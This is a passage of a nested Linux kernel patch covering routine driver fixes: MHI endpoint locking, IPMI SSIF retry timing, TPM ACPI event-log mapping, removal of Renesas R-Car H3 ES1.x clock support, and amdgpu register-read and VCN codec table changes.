++	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	mhi_ep_suspend_channels(mhi_cntrl);
+@@ -115,10 +116,13 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M3 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -127,22 +131,24 @@ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	enum mhi_state mhi_state;
+ 	int ret, is_ready;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	/* Ensure that the MHISTATUS is set to RESET by host */
+ 	mhi_state = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_MHISTATE_MASK);
+ 	is_ready = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_READY_MASK);
+ 
+ 	if (mhi_state != MHI_STATE_RESET || is_ready) {
+ 		dev_err(dev, "READY state transition failed. MHI host not in RESET state\n");
+-		spin_unlock_bh(&mhi_cntrl->state_lock);
+-		return -EIO;
++		ret = -EIO;
++		goto err_unlock;
+ 	}
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_READY);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret)
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+ 
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
+ 	return ret;
+ }
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index 7c606c49cd535..a5ddebb1edea4 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -74,7 +74,8 @@
+ /*
+  * Timer values
+  */
+-#define SSIF_MSG_USEC		20000	/* 20ms between message tries. */
++#define SSIF_MSG_USEC		60000	/* 60ms between message tries (T3). */
++#define SSIF_REQ_RETRY_USEC	60000	/* 60ms between send retries (T6). */
+ #define SSIF_MSG_PART_USEC	5000	/* 5ms for a message part */
+ 
+ /* How many times to we retry sending/receiving the message. */
+@@ -82,7 +83,9 @@
+ #define	SSIF_RECV_RETRIES	250
+ 
+ #define SSIF_MSG_MSEC		(SSIF_MSG_USEC / 1000)
++#define SSIF_REQ_RETRY_MSEC	(SSIF_REQ_RETRY_USEC / 1000)
+ #define SSIF_MSG_JIFFIES	((SSIF_MSG_USEC * 1000) / TICK_NSEC)
++#define SSIF_REQ_RETRY_JIFFIES	((SSIF_REQ_RETRY_USEC * 1000) / TICK_NSEC)
+ #define SSIF_MSG_PART_JIFFIES	((SSIF_MSG_PART_USEC * 1000) / TICK_NSEC)
+ 
+ /*
+@@ -229,6 +232,9 @@ struct ssif_info {
+ 	bool		    got_alert;
+ 	bool		    waiting_alert;
+ 
++	/* Used to inform the timeout that it should do a resend. */
++	bool		    do_resend;
++
+ 	/*
+ 	 * If set to true, this will request events the next time the
+ 	 * state machine is idle.
+@@ -241,12 +247,6 @@ struct ssif_info {
+ 	 */
+ 	bool                req_flags;
+ 
+-	/*
+-	 * Used to perform timer operations when run-to-completion
+-	 * mode is on.  This is a countdown timer.
+-	 */
+-	int                 rtc_us_timer;
+-
+ 	/* Used for sending/receiving data.  +1 for the length. */
+ 	unsigned char data[IPMI_MAX_MSG_LENGTH + 1];
+ 	unsigned int  data_len;
+@@ -530,7 +530,6 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 
+ static void start_get(struct ssif_info *ssif_info)
+ {
+-	ssif_info->rtc_us_timer = 0;
+ 	ssif_info->multi_pos = 0;
+ 
+ 	ssif_i2c_send(ssif_info, msg_done_handler, I2C_SMBUS_READ,
+@@ -538,22 +537,28 @@ static void start_get(struct ssif_info *ssif_info)
+ 		  ssif_info->recv, I2C_SMBUS_BLOCK_DATA);
+ }
+ 
++static void start_resend(struct ssif_info *ssif_info);
++
+ static void retry_timeout(struct timer_list *t)
+ {
+ 	struct ssif_info *ssif_info = from_timer(ssif_info, t, retry_timer);
+ 	unsigned long oflags, *flags;
+-	bool waiting;
++	bool waiting, resend;
+ 
+ 	if (ssif_info->stopping)
+ 		return;
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
++	resend = ssif_info->do_resend;
++	ssif_info->do_resend = false;
+ 	waiting = ssif_info->waiting_alert;
+ 	ssif_info->waiting_alert = false;
+ 	ipmi_ssif_unlock_cond(ssif_info, flags);
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
++	if (resend)
++		start_resend(ssif_info);
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -602,8 +607,6 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static void start_resend(struct ssif_info *ssif_info);
+-
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+ {
+@@ -622,7 +625,6 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 
+ 			flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 			ssif_info->waiting_alert = true;
+-			ssif_info->rtc_us_timer = SSIF_MSG_USEC;
+ 			if (!ssif_info->stopping)
+ 				mod_timer(&ssif_info->retry_timer,
+ 					  jiffies + SSIF_MSG_JIFFIES);
+@@ -909,7 +911,13 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			start_resend(ssif_info);
++			/*
++			 * Wait the retry timeout time per the spec,
++			 * then redo the send.
++			 */
++			ssif_info->do_resend = true;
++			mod_timer(&ssif_info->retry_timer,
++				  jiffies + SSIF_REQ_RETRY_JIFFIES);
+ 			return;
+ 		}
+ 
+@@ -973,7 +981,6 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 			/* Wait a jiffie then request the next message */
+ 			ssif_info->waiting_alert = true;
+ 			ssif_info->retries_left = SSIF_RECV_RETRIES;
+-			ssif_info->rtc_us_timer = SSIF_MSG_PART_USEC;
+ 			if (!ssif_info->stopping)
+ 				mod_timer(&ssif_info->retry_timer,
+ 					  jiffies + SSIF_MSG_PART_JIFFIES);
+@@ -1320,8 +1327,10 @@ static int do_cmd(struct i2c_client *client, int len, unsigned char *msg,
+ 	ret = i2c_smbus_write_block_data(client, SSIF_IPMI_REQUEST, len, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry1;
++		}
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1462,8 +1471,10 @@ retry_write:
+ 					 32, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry_write;
++		}
+ 		dev_err(&client->dev, "Could not write multi-part start, though the BMC said it could handle it.  Just limit sends to one part.\n");
+ 		return ret;
+ 	}
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 0913d3eb8d518..cd266021d0103 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -143,8 +143,12 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 
+ 	ret = -EIO;
+ 	virt = acpi_os_map_iomem(start, len);
+-	if (!virt)
++	if (!virt) {
++		dev_warn(&chip->dev, "%s: Failed to map ACPI memory\n", __func__);
++		/* try EFI log next */
++		ret = -ENODEV;
+ 		goto err;
++	}
+ 
+ 	memcpy_fromio(log->bios_event_log, virt, len);
+ 
+diff --git a/drivers/clk/renesas/Kconfig b/drivers/clk/renesas/Kconfig
+index cacaf9b87d264..37632a0659d82 100644
+--- a/drivers/clk/renesas/Kconfig
++++ b/drivers/clk/renesas/Kconfig
+@@ -22,7 +22,7 @@ config CLK_RENESAS
+ 	select CLK_R8A7791 if ARCH_R8A7791 || ARCH_R8A7793
+ 	select CLK_R8A7792 if ARCH_R8A7792
+ 	select CLK_R8A7794 if ARCH_R8A7794
+-	select CLK_R8A7795 if ARCH_R8A77950 || ARCH_R8A77951
++	select CLK_R8A7795 if ARCH_R8A77951
+ 	select CLK_R8A77960 if ARCH_R8A77960
+ 	select CLK_R8A77961 if ARCH_R8A77961
+ 	select CLK_R8A77965 if ARCH_R8A77965
+diff --git a/drivers/clk/renesas/r8a7795-cpg-mssr.c b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+index 301475c74f500..7a585a777d387 100644
+--- a/drivers/clk/renesas/r8a7795-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+@@ -128,7 +128,6 @@ static struct cpg_core_clk r8a7795_core_clks[] __initdata = {
+ };
+ 
+ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+-	DEF_MOD("fdp1-2",		 117,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fdp1-1",		 118,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fdp1-0",		 119,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("tmu4",			 121,	R8A7795_CLK_S0D6),
+@@ -162,7 +161,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("pcie1",		 318,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("pcie0",		 319,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac30",		 326,	R8A7795_CLK_S3D1),
+-	DEF_MOD("usb3-if1",		 327,	R8A7795_CLK_S3D1), /* ES1.x */
+ 	DEF_MOD("usb3-if0",		 328,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac31",		 329,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac0",		 330,	R8A7795_CLK_S3D1),
+@@ -187,28 +185,21 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("hscif0",		 520,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("thermal",		 522,	R8A7795_CLK_CP),
+ 	DEF_MOD("pwm",			 523,	R8A7795_CLK_S0D12),
+-	DEF_MOD("fcpvd3",		 600,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvd2",		 601,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd1",		 602,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd0",		 603,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvb1",		 606,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvb0",		 607,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpvi2",		 609,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvi1",		 610,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvi0",		 611,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpf2",		 613,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpf1",		 614,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpf0",		 615,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpci1",		 616,	R8A7795_CLK_S2D1), /* ES1.x */
+-	DEF_MOD("fcpci0",		 617,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpcs",		 619,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspd3",		 620,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspd2",		 621,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd1",		 622,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd0",		 623,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspbc",		 624,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspbd",		 626,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspi2",		 629,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspi1",		 630,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspi0",		 631,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("ehci3",		 700,	R8A7795_CLK_S3D2),
+@@ -221,7 +212,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("cmm2",			 709,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm1",			 710,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm0",			 711,	R8A7795_CLK_S2D1),
+-	DEF_MOD("csi21",		 713,	R8A7795_CLK_CSI0), /* ES1.x */
+ 	DEF_MOD("csi20",		 714,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi41",		 715,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi40",		 716,	R8A7795_CLK_CSI0),
+@@ -350,103 +340,26 @@ static const struct rcar_gen3_cpg_pll_config cpg_pll_configs[16] __initconst = {
+ 	{ 2,		192,	1,	192,	1,	32,	},
+ };
+ 
+-static const struct soc_device_attribute r8a7795es1[] __initconst = {
++static const struct soc_device_attribute r8a7795_denylist[] __initconst = {
+ 	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+ 	{ /* sentinel */ }
+ };
+ 
+-
+-	/*
+-	 * Fixups for R-Car H3 ES1.x
+-	 */
+-
+-static const unsigned int r8a7795es1_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(326),			/* USB-DMAC3-0 */
+-	MOD_CLK_ID(329),			/* USB-DMAC3-1 */
+-	MOD_CLK_ID(700),			/* EHCI/OHCI3 */
+-	MOD_CLK_ID(705),			/* HS-USB-IF3 */
+-
+-};
+-
+-static const struct mssr_mod_reparent r8a7795es1_mod_reparent[] __initconst = {
+-	{ MOD_CLK_ID(118), R8A7795_CLK_S2D1 },	/* FDP1-1 */
+-	{ MOD_CLK_ID(119), R8A7795_CLK_S2D1 },	/* FDP1-0 */
+-	{ MOD_CLK_ID(121), R8A7795_CLK_S3D2 },	/* TMU4 */
+-	{ MOD_CLK_ID(217), R8A7795_CLK_S3D1 },	/* SYS-DMAC2 */
+-	{ MOD_CLK_ID(218), R8A7795_CLK_S3D1 },	/* SYS-DMAC1 */
+-	{ MOD_CLK_ID(219), R8A7795_CLK_S3D1 },	/* SYS-DMAC0 */
+-	{ MOD_CLK_ID(408), R8A7795_CLK_S3D1 },	/* INTC-AP */
+-	{ MOD_CLK_ID(501), R8A7795_CLK_S3D1 },	/* AUDMAC1 */
+-	{ MOD_CLK_ID(502), R8A7795_CLK_S3D1 },	/* AUDMAC0 */
+-	{ MOD_CLK_ID(523), R8A7795_CLK_S3D4 },	/* PWM */
+-	{ MOD_CLK_ID(601), R8A7795_CLK_S2D1 },	/* FCPVD2 */
+-	{ MOD_CLK_ID(602), R8A7795_CLK_S2D1 },	/* FCPVD1 */
+-	{ MOD_CLK_ID(603), R8A7795_CLK_S2D1 },	/* FCPVD0 */
+-	{ MOD_CLK_ID(606), R8A7795_CLK_S2D1 },	/* FCPVB1 */
+-	{ MOD_CLK_ID(607), R8A7795_CLK_S2D1 },	/* FCPVB0 */
+-	{ MOD_CLK_ID(610), R8A7795_CLK_S2D1 },	/* FCPVI1 */
+-	{ MOD_CLK_ID(611), R8A7795_CLK_S2D1 },	/* FCPVI0 */
+-	{ MOD_CLK_ID(614), R8A7795_CLK_S2D1 },	/* FCPF1 */
+-	{ MOD_CLK_ID(615), R8A7795_CLK_S2D1 },	/* FCPF0 */
+-	{ MOD_CLK_ID(619), R8A7795_CLK_S2D1 },	/* FCPCS */
+-	{ MOD_CLK_ID(621), R8A7795_CLK_S2D1 },	/* VSPD2 */
+-	{ MOD_CLK_ID(622), R8A7795_CLK_S2D1 },	/* VSPD1 */
+-	{ MOD_CLK_ID(623), R8A7795_CLK_S2D1 },	/* VSPD0 */
+-	{ MOD_CLK_ID(624), R8A7795_CLK_S2D1 },	/* VSPBC */
+-	{ MOD_CLK_ID(626), R8A7795_CLK_S2D1 },	/* VSPBD */
+-	{ MOD_CLK_ID(630), R8A7795_CLK_S2D1 },	/* VSPI1 */
+-	{ MOD_CLK_ID(631), R8A7795_CLK_S2D1 },	/* VSPI0 */
+-	{ MOD_CLK_ID(804), R8A7795_CLK_S2D1 },	/* VIN7 */
+-	{ MOD_CLK_ID(805), R8A7795_CLK_S2D1 },	/* VIN6 */
+-	{ MOD_CLK_ID(806), R8A7795_CLK_S2D1 },	/* VIN5 */
+-	{ MOD_CLK_ID(807), R8A7795_CLK_S2D1 },	/* VIN4 */
+-	{ MOD_CLK_ID(808), R8A7795_CLK_S2D1 },	/* VIN3 */
+-	{ MOD_CLK_ID(809), R8A7795_CLK_S2D1 },	/* VIN2 */
+-	{ MOD_CLK_ID(810), R8A7795_CLK_S2D1 },	/* VIN1 */
+-	{ MOD_CLK_ID(811), R8A7795_CLK_S2D1 },	/* VIN0 */
+-	{ MOD_CLK_ID(812), R8A7795_CLK_S3D2 },	/* EAVB-IF */
+-	{ MOD_CLK_ID(820), R8A7795_CLK_S2D1 },	/* IMR3 */
+-	{ MOD_CLK_ID(821), R8A7795_CLK_S2D1 },	/* IMR2 */
+-	{ MOD_CLK_ID(822), R8A7795_CLK_S2D1 },	/* IMR1 */
+-	{ MOD_CLK_ID(823), R8A7795_CLK_S2D1 },	/* IMR0 */
+-	{ MOD_CLK_ID(905), R8A7795_CLK_CP },	/* GPIO7 */
+-	{ MOD_CLK_ID(906), R8A7795_CLK_CP },	/* GPIO6 */
+-	{ MOD_CLK_ID(907), R8A7795_CLK_CP },	/* GPIO5 */
+-	{ MOD_CLK_ID(908), R8A7795_CLK_CP },	/* GPIO4 */
+-	{ MOD_CLK_ID(909), R8A7795_CLK_CP },	/* GPIO3 */
+-	{ MOD_CLK_ID(910), R8A7795_CLK_CP },	/* GPIO2 */
+-	{ MOD_CLK_ID(911), R8A7795_CLK_CP },	/* GPIO1 */
+-	{ MOD_CLK_ID(912), R8A7795_CLK_CP },	/* GPIO0 */
+-	{ MOD_CLK_ID(918), R8A7795_CLK_S3D2 },	/* I2C6 */
+-	{ MOD_CLK_ID(919), R8A7795_CLK_S3D2 },	/* I2C5 */
+-	{ MOD_CLK_ID(927), R8A7795_CLK_S3D2 },	/* I2C4 */
+-	{ MOD_CLK_ID(928), R8A7795_CLK_S3D2 },	/* I2C3 */
+-};
+-
+-
+-	/*
+-	 * Fixups for R-Car H3 ES2.x
+-	 */
+-
+-static const unsigned int r8a7795es2_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(117),			/* FDP1-2 */
+-	MOD_CLK_ID(327),			/* USB3-IF1 */
+-	MOD_CLK_ID(600),			/* FCPVD3 */
+-	MOD_CLK_ID(609),			/* FCPVI2 */
+-	MOD_CLK_ID(613),			/* FCPF2 */
+-	MOD_CLK_ID(616),			/* FCPCI1 */
+-	MOD_CLK_ID(617),			/* FCPCI0 */
+-	MOD_CLK_ID(620),			/* VSPD3 */
+-	MOD_CLK_ID(629),			/* VSPI2 */
+-	MOD_CLK_ID(713),			/* CSI21 */
+-};
+-
+ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ {
+ 	const struct rcar_gen3_cpg_pll_config *cpg_pll_config;
+ 	u32 cpg_mode;
+ 	int error;
+ 
++	/*
++	 * We panic here to ensure removed SoCs and clk updates are always in
++	 * sync to avoid overclocking damages. The panic can only be seen with
++	 * commandline args 'earlycon keep_bootcon'. But these SoCs were for
++	 * developers only anyhow.
++	 */
++	if (soc_device_match(r8a7795_denylist))
++		panic("SoC not supported anymore!\n");
++
+ 	error = rcar_rst_read_mode_pins(&cpg_mode);
+ 	if (error)
+ 		return error;
+@@ -457,25 +370,6 @@ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_device_match(r8a7795es1)) {
+-		cpg_core_nullify_range(r8a7795_core_clks,
+-				       ARRAY_SIZE(r8a7795_core_clks),
+-				       R8A7795_CLK_S0D2, R8A7795_CLK_S0D12);
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es1_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es1_mod_nullify));
+-		mssr_mod_reparent(r8a7795_mod_clks,
+-				  ARRAY_SIZE(r8a7795_mod_clks),
+-				  r8a7795es1_mod_reparent,
+-				  ARRAY_SIZE(r8a7795es1_mod_reparent));
+-	} else {
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es2_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es2_mod_nullify));
+-	}
+-
+ 	return rcar_gen3_cpg_init(cpg_pll_config, CLK_EXTALR, cpg_mode);
+ }
+ 
+diff --git a/drivers/clk/renesas/rcar-gen3-cpg.c b/drivers/clk/renesas/rcar-gen3-cpg.c
+index e668f23c75e7d..b3ef62fa612e3 100644
+--- a/drivers/clk/renesas/rcar-gen3-cpg.c
++++ b/drivers/clk/renesas/rcar-gen3-cpg.c
+@@ -310,19 +310,10 @@ static unsigned int cpg_clk_extalr __initdata;
+ static u32 cpg_mode __initdata;
+ static u32 cpg_quirks __initdata;
+ 
+-#define PLL_ERRATA	BIT(0)		/* Missing PLL0/2/4 post-divider */
+ #define RCKCR_CKSEL	BIT(1)		/* Manual RCLK parent selection */
+ 
+ 
+ static const struct soc_device_attribute cpg_quirks_match[] __initconst = {
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.0",
+-		.data = (void *)(PLL_ERRATA | RCKCR_CKSEL),
+-	},
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.*",
+-		.data = (void *)(RCKCR_CKSEL),
+-	},
+ 	{
+ 		.soc_id = "r8a7796", .revision = "ES1.0",
+ 		.data = (void *)(RCKCR_CKSEL),
+@@ -355,9 +346,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL0CR, 0);
++					    base, 2, CPG_PLL0CR, 0);
+ 
+ 	case CLK_TYPE_GEN3_PLL1:
+ 		mult = cpg_pll_config->pll1_mult;
+@@ -370,9 +360,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL2CR, 2);
++					    base, 2, CPG_PLL2CR, 2);
+ 
+ 	case CLK_TYPE_GEN3_PLL3:
+ 		mult = cpg_pll_config->pll3_mult;
+@@ -388,8 +377,6 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 */
+ 		value = readl(base + CPG_PLL4CR);
+ 		mult = (((value >> 24) & 0x7f) + 1) * 2;
+-		if (cpg_quirks & PLL_ERRATA)
+-			mult *= 2;
+ 		break;
+ 
+ 	case CLK_TYPE_GEN3_SDH:
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.c b/drivers/clk/renesas/renesas-cpg-mssr.c
+index 1a0cdf001b2f2..523fd45231571 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.c
++++ b/drivers/clk/renesas/renesas-cpg-mssr.c
+@@ -1113,19 +1113,6 @@ static int __init cpg_mssr_init(void)
+ 
+ subsys_initcall(cpg_mssr_init);
+ 
+-void __init cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < num_core_clks; i++)
+-		if (core_clks[i].id >= first_clk &&
+-		    core_clks[i].id <= last_clk)
+-			core_clks[i].name = NULL;
+-}
+-
+ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n)
+@@ -1139,19 +1126,5 @@ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 		}
+ }
+ 
+-void __init mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < num_mod_clks && j < n; i++)
+-		if (mod_clks[i].id == clks[j].clk) {
+-			mod_clks[i].parent = clks[j].parent;
+-			j++;
+-		}
+-}
+-
+ MODULE_DESCRIPTION("Renesas CPG/MSSR Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.h b/drivers/clk/renesas/renesas-cpg-mssr.h
+index 1c3c057d17f53..80c5b462924ac 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.h
++++ b/drivers/clk/renesas/renesas-cpg-mssr.h
+@@ -187,21 +187,7 @@ void __init cpg_mssr_early_init(struct device_node *np,
+     /*
+      * Helpers for fixing up clock tables depending on SoC revision
+      */
+-
+-struct mssr_mod_reparent {
+-	unsigned int clk, parent;
+-};
+-
+-
+-extern void cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk);
+ extern void mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n);
+-extern void mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n);
+ #endif
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index 6853b93ac82e7..df3388e8dec00 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -393,9 +393,10 @@ static int nv_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(nv_allowed_read_registers); i++) {
+ 		en = &nv_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = nv_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 7cd17dda32ceb..2eddd7f6cd41e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -439,8 +439,9 @@ static int soc15_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc15_allowed_read_registers); i++) {
+ 		en = &soc15_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-			reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+ 					+ en->reg_offset))
+ 			continue;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 230e15fed755c..9c52af5005253 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -47,19 +47,31 @@
+ static const struct amd_ip_funcs soc21_common_ip_funcs;
+ 
+ /* SOC21 */
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_encode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
